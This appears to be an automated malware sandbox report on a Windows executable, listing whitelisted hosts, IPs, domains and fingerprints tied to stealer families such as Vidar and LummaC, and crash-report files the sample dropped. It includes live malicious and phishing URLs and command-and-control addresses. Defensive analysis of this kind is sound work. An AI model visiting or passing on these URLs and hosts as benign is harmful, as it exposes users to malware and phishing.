                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 199.232.210.172, 172.217.19.238, 64.233.162.84, 172.217.21.35, 142.250.181.142, 172.217.17.46, 142.250.181.99, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 172.165.61.93, 23.32.239.18, 23.32.239.56, 2.16.158.51, 2.16.158.58, 2.16.158.56, 2.16.158.43, 2.16.158.75, 2.16.158.50, 2.16.158.73, 2.16.158.80, 2.16.158.74, 172.165.69.228, 2.18.64.218, 2.18.64.203, 104.126.36.56, 104.126.36.73, 104.126.36.90, 104.126.36.74, 104.126.36.49, 104.126.36.88, 104.126.36.91, 104.126.36.83, 104.126.36.82, 2.16.158.88, 2.16.158.90, 2.16.158.89, 2.16.158.83, 217.20.58.98, 20.42.73.29, 199.232.214.172, 23.32.239.73, 2.19.198.34, 142.250.65.227, 142.251.40.99, 142.251.40.227, 13.107.246.63, 4.245.163.56, 23.218.208.109, 94.245.104.56, 20.190.181.5, 23.200.0.6, 52.228.161.161, 13.107.246.40, 104.117.182.27, 204.79.197.237, 23.96.180.189
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, deff.nelreports.net.akamaized.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, config.edge.skype.com.trafficmanag
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • VT rate limit hit for: dZKPE9gotO.exe

                                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                  11:08:25API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  23.33.40.139file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                    https://www.google.md/url?url=https://demeropkdfzdbi&uxzs=zemleptc&icmeyuc=zn0&ywprgz=icmeyuc&uxzs=zemleptc&ywprgz=icmeyuc&fzdbi=demeropkd&znzn=ywprgzuxzs&q=amp%2Fdecentafrica.com%2Flok%2F1160851136%2FZHVzdGluLmZpY2NvQHZvc3Nsb2guY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      23.219.82.75file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                          116.203.12.114nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/?setln=pl
                                                                                                                                                                                                                                                http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.dog/
                                                                                                                                                                                                                                                LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                • t.me/cinoshibot
                                                                                                                                                                                                                                                jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                • t.me/cinoshibot

                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                t.menB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 104.26.10.61
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                chrome.cloudflare-dns.comnB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                AyqwnIUrcz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 162.159.61.3
                                                                                                                                                                                                                                                Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 172.64.41.3
                                                                                                                                                                                                                                                ssl.bingadsedgeextension-prod-europe.azurewebsites.netnB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 94.245.104.56
                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 94.245.104.56

                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                TELEGRAMRUQUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                                FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                                REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                                PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                                nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                                AKAMAI-ASN1EUREQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                • 172.234.222.138
                                                                                                                                                                                                                                                https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 2.16.158.75
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 23.209.72.33
                                                                                                                                                                                                                                                https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                • 104.126.36.32
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 204.237.205.123
                                                                                                                                                                                                                                                bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 95.100.100.165
                                                                                                                                                                                                                                                bot.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 95.100.100.171
                                                                                                                                                                                                                                                bot.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 95.100.100.142
                                                                                                                                                                                                                                                armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 2.21.22.15
                                                                                                                                                                                                                                                AKAMAI-ASN1EUREQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                • 172.234.222.138
                                                                                                                                                                                                                                                https://login.corp-internal.org/17058d3d8656ed69?l=27Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 2.16.158.75
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 23.209.72.33
                                                                                                                                                                                                                                                https://cavotec-au.sharefile.com/public/share/web-1271a93971714a91Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                • 104.126.36.32
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                                                                                                mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 204.237.205.123
                                                                                                                                                                                                                                                bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 95.100.100.165
                                                                                                                                                                                                                                                bot.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 95.100.100.171
                                                                                                                                                                                                                                                bot.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                • 95.100.100.142
                                                                                                                                                                                                                                                armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 2.21.22.15
                                                                                                                                                                                                                                                HETZNER-ASDEdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161
                                                                                                                                                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161
                                                                                                                                                                                                                                                nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161
                                                                                                                                                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161
                                                                                                                                                                                                                                                ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                • 159.69.249.103
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 94.130.137.154
                                                                                                                                                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 188.40.187.161

                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                KlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                Arrival Notice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                • 149.154.167.99

                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_dZKPE9gotO.exe_772ee83240cff7b05b7fa4df8e31daa3216cf6d_5bd4c7f7_232513c3-0a90-46f7-ac5c-080fa1c4c3f2\Report.wer

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                Entropy (8bit):1.236158375923585
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:mpImVYD8+r0JhH0fjOjuLZr0gfsCGHzuiFFZ24IO8oEGm:tDyJhH0ijrRdzuiFFY4IO8y
                                                                                                                                                                                                                                                MD5:00CAB52D2870A93D4D102FC51CDFE5B5
                                                                                                                                                                                                                                                SHA1:36208AFB63912DBF5C9DCDA25217C02B11F3DA3C
                                                                                                                                                                                                                                                SHA-256:0F0EF8E955A286B4D16B4307347048CA4A61DA8036C837039B1FC9A1B6A0412C
                                                                                                                                                                                                                                                SHA-512:81173480DCCA252E712780AD338CB367EE88C2CED2ACB4BF357B5ED1DF6153659E5180ACEFAF0611B59ACC294ABE8F39D4D2C724D28FAB3224AC33ECA12E5A54
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.3.8.9.0.0.2.2.7.5.8.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.3.8.9.0.0.8.5.2.5.7.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.2.5.1.3.c.3.-.0.a.9.0.-.4.6.f.7.-.a.c.5.c.-.0.8.0.f.a.1.c.4.c.3.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.d.6.c.f.3.4.-.f.f.9.c.-.4.7.3.3.-.8.5.e.8.-.8.6.7.6.0.a.8.b.1.e.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.d.Z.K.P.E.9.g.o.t.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.d.0.-.0.0.0.1.-.0.0.1.4.-.5.3.7.d.-.4.a.4.d.c.8.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.4.d.5.9.9.f.6.d.6.6.b.0.f.4.d.5.e.4.4.e.6.0.3.e.2.a.d.2.5.5.2.0.0.0.0.f.f.f.f.!.0.0.0.0.2.c.1.2.b.3.8.e.d.2.d.8.4.7.2.2.c.f.5.d.c.e.a.8.b.d.4.5.c.f.a.7.d.7.b.5.5.b.a.4.!.d.Z.K.P.E.9.g.o.t.O...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER558E.tmp.dmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Mon Dec 16 16:08:20 2024, 0x1205a4 type
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):108166
                                                                                                                                                                                                                                                Entropy (8bit):2.145769887427562
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:buEFVBKJkrE3Q9FIi9WwmpJLiC+gUaqhCpB6Ss/z42lqUpNfxh:bLFvGkrE3Ri9W7pJLnL61ZZlqs5
                                                                                                                                                                                                                                                MD5:86CBD56990E5479AC1CD1013E7AB4024
                                                                                                                                                                                                                                                SHA1:B0DA21B51A57594240CF52ECA95B10BEB5D18255
                                                                                                                                                                                                                                                SHA-256:08311042A74532438F83E988E0A554204127FABC958372C04670C0888D9E88BF
                                                                                                                                                                                                                                                SHA-512:42FA6CD5E94A52A2D6526817556C6600F45E8CEB10F53EB3B628BA3A6EAFBED9DA5A4C6F7F8946F4FB28A799B50C71CE161D6A3083E0A779A4B9882EA90CA5B2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MDMP..a..... .......tP`g............4............%..<.......T....@..........T.......8...........T............}...(..........8-..........$/..............................................................................eJ......./......GenuineIntel............T............;`g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5716.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8336
                                                                                                                                                                                                                                                Entropy (8bit):3.695547320592409
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJblz6KV6YNQgSU9QgmfiijVjcpDM89b3vsf19m:R6lXJN6Y6YugSU9QgmfzVjI3UfO
                                                                                                                                                                                                                                                MD5:D4292D55DDB140CD8C8F28698122E58A
                                                                                                                                                                                                                                                SHA1:33EB17D4EB5F5E3B901F8071F109430C53A5DA66
                                                                                                                                                                                                                                                SHA-256:04869C9BE40EEAF9A84835E88203F7B335A5C8A32A55A78F7F111CDE7D171D62
                                                                                                                                                                                                                                                SHA-512:DEB9467F33F2F667A739511888F59D2408885A1EEDBA3AA3F3B476B02DFE512CEEFFF81959935CAD18079966BD709450DD5F645D38442230754D9B1BBFE06AAB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.0.0.<./.P.i.

                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5746.tmp.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4579
                                                                                                                                                                                                                                                Entropy (8bit):4.474839597040731
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zspJg77aI9SlWpW8VYAYm8M4Jp3HFte+q8Kn2TbyVd:uIjf7I7EU7VQJp26vyVd
                                                                                                                                                                                                                                                MD5:DD71441ECD958A26F68D5ED43463C252
                                                                                                                                                                                                                                                SHA1:06C5750E4035A35B8A5C1D2FB0CFC49DECC1A266
                                                                                                                                                                                                                                                SHA-256:A8027675E2BAF15D98BD8149320A75D308453048B681A3DBB7C6290A36518835
